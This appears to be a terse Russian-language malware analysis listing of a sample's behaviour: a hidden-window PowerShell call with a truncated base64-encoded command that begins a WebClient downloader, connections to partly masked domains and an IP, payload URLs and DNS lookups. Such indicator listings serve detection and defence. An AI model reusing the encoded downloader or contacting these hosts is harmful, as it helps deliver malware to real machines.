Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLADkAXwAzAF8AXwA0AF8APQAoACcAawBfACcAKwAnADAANQA1ADYAJwApADsAJABrADMAXwA0ADQANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABEAF8AXwA4ADcAMwA9ACgAJwBoAHQAdAAnAC...
- 'bi####thbarbell.com':80
- 'bi####thbarbell.com':443
- '91.##9.233.236':80
- http://bi####thbarbell.com/75AixBQLQ8_DbrdTc
- http://91.##9.233.236/eRR8zYJVDDEXiR
- 'bi####thbarbell.com':443
- DNS ASK ba###teabi.com
- DNS ASK bi####thbarbell.com
- DNS ASK or###omsk.ru
- DNS ASK bi######ghiduong24h.info
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLADkAXwAzAF8AXwA0AF8APQAoACcAawBfACcAKwAnADAANQA1ADYAJwApADsAJABrADMAXwA0ADQANAA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABEAF8AXwA4ADcAMwA9ACgAJwBoAHQAdAAnAC...' (со скрытым окном)